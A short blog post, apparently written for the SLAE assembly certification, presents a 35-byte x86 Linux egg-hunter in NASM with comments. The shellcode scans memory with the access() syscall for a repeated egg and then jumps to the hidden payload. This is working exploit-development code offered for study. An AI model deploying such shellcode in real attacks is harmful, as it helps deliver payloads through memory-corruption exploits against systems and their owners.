lunes, 5 de mayo de 2014

[SLAE] III Egg Hunting

Source: SecurityTube


I found a very interesting document explained different techniques of Egg hunting, in this document explained how to search it in Windows and Linux, you can found this document here. I really recommend read this paper if you want know how it works
;SLAE-513 Andriy Brukhovetskyy
;egg hunting explained some techniques  
;http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
;35 bytes

global _start
section .text
_start:

    xor ecx, ecx    ; 0
        
get_memory_block:
    or dx, 0xfff    ; is the same as "add dx, 4095" (PAGE_SIZE)
        
checker:

    inc edx         ; next memory offset
    push byte +0x21 ; __NR_access 33
    pop eax

    lea ebx, [edx+4] ; alignment to validate the last four bytes of the signature
                     ; ecx already contains 0 (F_OK)
    int 0x80         ; syscall

    ; bad address = EFAULT = 0xf2 = -14
    cmp al, 0xf2; because it's not a file

    jz get_memory_block ; if is not, loop

    mov eax, 0x50905090 ; egg here in little endiant
    mov edi, edx
    
    scasd; compare next 4 bytes and edi+4 
    jnz checker ; return and search

    scasd; compare next 4 bytes and edi+4 
    jnz checker ; return and search

    jmp edi; if we here == we found the eggs, jump to our shellcode :)

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:


No hay comentarios:

Publicar un comentario